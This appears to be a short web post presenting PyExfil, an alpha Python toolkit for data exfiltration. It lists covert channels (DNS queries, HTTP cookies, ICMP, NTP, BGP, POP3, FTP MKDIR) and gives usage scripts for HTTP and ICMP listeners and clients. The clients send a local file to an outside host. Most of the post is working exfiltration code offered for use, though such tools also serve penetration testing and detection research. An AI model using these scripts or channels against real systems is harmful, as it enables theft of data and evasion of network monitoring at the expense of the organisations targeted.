PyExfil – Python Data Exfiltration Tools

PyExfil started as a Proof of Concept (PoC) and has ended up turning into a Python Data Exfiltration toolkit, which can execute various techniques based around commonly allowed protocols (HTTP, ICMP, DNS etc).

The package is very early stage (alpha release) so is not fully tested, any feedback and commits are welcomed by the author.

Features

Currently PyExfil supports:

• DNS query
• HTTP Cookie
• ICMP (8)
• NTP requests
• BGP Open
• POP3 Authentication (as password)
• FTP MKDIR technique

Usage

HTTP Exfilatration Server

1 2 3 4 5 6 7 8

#!/usr/bin/python from exfiltration.http_exfiltration import * def main():     print "Starting a listener: "     listen("127.0.0.1", 80)   if __name__ == "__main__":     main()

HTTP Exfiltration Client

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

#!/usr/bin/python   from exfiltration.http_exfiltration import *   def main():     FILE_TO_EXFIL = "/bin/bash"     ADDR = "www.morirt.com"       if send_file(ADDR, FILE_TO_EXFIL) == 0:         print "File exfiltrated okay."     else:         print "Damn thing failed."   if __name__ == "__main__":     main()

ICMP Server

1 2 3 4 5 6 7 8 9 10 11 12

#!/usr/bin/python   from exfiltration.icmp_exfiltration import *   def main():     ADDR = "127.0.0.1"     TMP_PATH = "/tmp/"       init_listener(ADDR, TMP_PATH)   if __name__ == "__main__":     main()

ICMP Exfiltrator

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

#!/usr/bin/python   from exfiltration.icmp_exfiltration import *   def main():     FILE_TO_EXFIL = "/bin/bash"     ADDR = "www.morirt.com"       if send_file(ADDR, FILE_TO_EXFIL) == 0:         print "File exfiltrated okay."     else:         print "Damn thing failed."   if __name__ == "__main__":     main()

You can download PyExfil here: